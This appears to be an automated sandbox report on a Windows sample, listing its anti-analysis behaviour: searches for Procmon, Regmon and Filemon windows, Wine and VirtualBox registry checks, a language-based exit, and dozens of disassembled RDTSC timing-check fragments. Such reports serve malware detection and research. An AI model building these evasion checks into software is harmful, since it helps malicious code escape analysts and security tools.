                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F49BB0

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37870
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E1A2 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jns 00007FAF1CCF5656h 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f stc 0x00000010 push dword ptr [ebp+122D0131h] 0x00000016 clc 0x00000017 call dword ptr [ebp+122D2758h] 0x0000001d pushad 0x0000001e cld 0x0000001f xor eax, eax 0x00000021 mov dword ptr [ebp+122D2EF4h], edx 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b pushad 0x0000002c call 00007FAF1CCF5665h 0x00000031 mov ebx, dword ptr [ebp+122D29A1h] 0x00000037 pop ecx 0x00000038 push ebx 0x00000039 jmp 00007FAF1CCF5668h 0x0000003e pop esi 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D2A61h], eax 0x00000046 or dword ptr [ebp+122D3381h], ebx 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2EF4h], edx 0x00000057 jmp 00007FAF1CCF565Fh 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jmp 00007FAF1CCF5668h 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D1882h], edi 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007FAF1CCF5665h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2EF4h], ebx 0x00000080 jp 00007FAF1CCF5657h 0x00000086 stc 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a jbe 00007FAF1CCF5658h 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C889 second address: 139C8C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 jmp 00007FAF1CBF1D59h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FAF1CBF1D46h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C8C0 second address: 139C8C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C8C4 second address: 139C8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C8CA second address: 139C8DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAF1CCF565Bh 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CB67 second address: 139CB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CB6B second address: 139CB84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c jmp 00007FAF1CCF565Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CCBC second address: 139CCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CDFA second address: 139CE37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAF1CCF5663h 0x0000000c jmp 00007FAF1CCF565Eh 0x00000011 jc 00007FAF1CCF5656h 0x00000017 jmp 00007FAF1CCF565Eh 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CFC7 second address: 139CFD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0CB5 second address: 13A0D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c push edx 0x0000000d jnc 00007FAF1CCF5656h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FAF1CCF5668h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 jmp 00007FAF1CCF5664h 0x00000028 pop ecx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0D00 second address: 13A0D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0D05 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FAF1CCF5661h 0x0000000f mov esi, dword ptr [ebp+122D2C35h] 0x00000015 push dword ptr [ebp+122D0131h] 0x0000001b jp 00007FAF1CCF5658h 0x00000021 push ebx 0x00000022 pop esi 0x00000023 call dword ptr [ebp+122D2758h] 0x00000029 pushad 0x0000002a cld 0x0000002b xor eax, eax 0x0000002d mov dword ptr [ebp+122D2EF4h], edx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 pushad 0x00000038 call 00007FAF1CCF5665h 0x0000003d mov ebx, dword ptr [ebp+122D29A1h] 0x00000043 pop ecx 0x00000044 push ebx 0x00000045 jmp 00007FAF1CCF5668h 0x0000004a pop esi 0x0000004b popad 0x0000004c mov dword ptr [ebp+122D2A61h], eax 0x00000052 or dword ptr [ebp+122D3381h], ebx 0x00000058 mov esi, 0000003Ch 0x0000005d sub dword ptr [ebp+122D2EF4h], edx 0x00000063 jmp 00007FAF1CCF565Fh 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c jmp 00007FAF1CCF5668h 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D1882h], edi 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d jmp 00007FAF1CCF5665h 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 mov dword ptr [ebp+122D2EF4h], ebx 0x0000008c jp 00007FAF1CCF5657h 0x00000092 stc 0x00000093 push eax 0x00000094 push eax 0x00000095 push edx 0x00000096 jbe 00007FAF1CCF5658h 0x0000009c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0D62 second address: 13A0DC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FAF1CBF1D46h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e and edi, dword ptr [ebp+122D2B15h] 0x00000014 mov dword ptr [ebp+122D2893h], ecx 0x0000001a popad 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, 6CEACAC0h 0x00000024 ja 00007FAF1CBF1D46h 0x0000002a popad 0x0000002b mov dword ptr [ebp+122D27B5h], eax 0x00000031 popad 0x00000032 call 00007FAF1CBF1D49h 0x00000037 jmp 00007FAF1CBF1D53h 0x0000003c push eax 0x0000003d jmp 00007FAF1CBF1D4Ch 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0DC6 second address: 13A0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5667h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0DE2 second address: 13A0DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0DE7 second address: 13A0DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0DED second address: 13A0DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0DFB second address: 13A0DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0E9F second address: 13A0EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0EA3 second address: 13A0EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0F2E second address: 13A0F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0F32 second address: 13A0FB6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007FAF1CCF5664h 0x00000011 nop 0x00000012 add esi, dword ptr [ebp+122D27ADh] 0x00000018 mov edi, dword ptr [ebp+122D2A35h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FAF1CCF5658h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov edx, dword ptr [ebp+122D2C25h] 0x00000040 call 00007FAF1CCF5659h 0x00000045 jo 00007FAF1CCF5663h 0x0000004b jmp 00007FAF1CCF565Dh 0x00000050 push eax 0x00000051 push eax 0x00000052 push eax 0x00000053 jp 00007FAF1CCF5656h 0x00000059 pop eax 0x0000005a pop eax 0x0000005b mov eax, dword ptr [esp+04h] 0x0000005f pushad 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0FB6 second address: 13A0FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FAF1CBF1D4Eh 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jnc 00007FAF1CBF1D4Eh 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0FE5 second address: 13A108D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF1CCF5669h 0x0000000b popad 0x0000000c pop eax 0x0000000d movsx ecx, cx 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FAF1CCF5658h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jl 00007FAF1CCF5659h 0x00000032 movsx edx, si 0x00000035 push 00000000h 0x00000037 add edx, 10B21B71h 0x0000003d or cx, 10D5h 0x00000042 push 00000003h 0x00000044 call 00007FAF1CCF5659h 0x00000049 pushad 0x0000004a jnp 00007FAF1CCF565Ch 0x00000050 push edi 0x00000051 pushad 0x00000052 popad 0x00000053 pop edi 0x00000054 popad 0x00000055 push eax 0x00000056 push edi 0x00000057 jmp 00007FAF1CCF5664h 0x0000005c pop edi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 pushad 0x00000062 jmp 00007FAF1CCF565Bh 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a pop eax 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A108D second address: 13A10C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jbe 00007FAF1CBF1D48h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A119C second address: 13A11A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A11A2 second address: 13A11A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A11A6 second address: 13A120F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push ebx 0x0000000f call 00007FAF1CCF5665h 0x00000014 adc si, B097h 0x00000019 pop ecx 0x0000001a pop edx 0x0000001b sub dword ptr [ebp+122D183Ch], ecx 0x00000021 push 00000000h 0x00000023 cmc 0x00000024 add ecx, dword ptr [ebp+122D2901h] 0x0000002a call 00007FAF1CCF5659h 0x0000002f pushad 0x00000030 jmp 00007FAF1CCF565Dh 0x00000035 jne 00007FAF1CCF5658h 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 pop edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A120F second address: 13A123B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jc 00007FAF1CBF1D6Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAF1CBF1D58h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A123B second address: 13A12BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FAF1CCF5669h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jp 00007FAF1CCF5662h 0x0000001b pop eax 0x0000001c jbe 00007FAF1CCF5659h 0x00000022 movsx edi, bx 0x00000025 push 00000003h 0x00000027 mov edx, dword ptr [ebp+122D2A15h] 0x0000002d push 00000000h 0x0000002f and esi, dword ptr [ebp+122D1C50h] 0x00000035 push 00000003h 0x00000037 adc dx, 7A0Ah 0x0000003c call 00007FAF1CCF5659h 0x00000041 push edx 0x00000042 jmp 00007FAF1CCF565Fh 0x00000047 pop edx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FAF1CCF565Ah 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A12BE second address: 13A12FB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF1CBF1D4Ch 0x00000008 jo 00007FAF1CBF1D46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jc 00007FAF1CBF1D5Ah 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d jmp 00007FAF1CBF1D50h 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jne 00007FAF1CBF1D48h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A12FB second address: 13A12FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A12FF second address: 13A1328 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF1CBF1D58h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DF7E second address: 138DF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DF82 second address: 138DF88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DF88 second address: 138DFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF1CCF5668h 0x0000000d jmp 00007FAF1CCF565Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DFB3 second address: 138DFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF70E second address: 13BF713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF713 second address: 13BF71A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF71A second address: 13BF72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FAF1CCF5656h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF72B second address: 13BF73B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF73B second address: 13BF741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF741 second address: 13BF757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF89D second address: 13BF8A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF8A1 second address: 13BF8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FAF1CBF1D52h 0x00000011 pop ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FAF1CBF1D52h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BFA27 second address: 13BFA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CCF5656h 0x0000000a jmp 00007FAF1CCF5660h 0x0000000f popad 0x00000010 push edi 0x00000011 js 00007FAF1CCF5656h 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BFA4A second address: 13BFA54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BFA54 second address: 13BFA6A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF1CCF5656h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FAF1CCF5656h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BFE64 second address: 13BFE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BFE6A second address: 13BFE7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FAF1CCF565Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0106 second address: 13C0110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0110 second address: 13C0116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0116 second address: 13C0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0120 second address: 13C0132 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FAF1CCF5656h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0132 second address: 13C013C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CBF1D46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C013C second address: 13C014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C014B second address: 13C014F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0295 second address: 13C029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C058A second address: 13C058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0880 second address: 13C088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C088A second address: 13C088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C088E second address: 13C08AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5663h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1310 second address: 13C131B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAF1CBF1D46h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C131B second address: 13C1320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C71BF second address: 13C71C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C71C8 second address: 13C71CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C71CC second address: 13C71D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C74A2 second address: 13C74A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
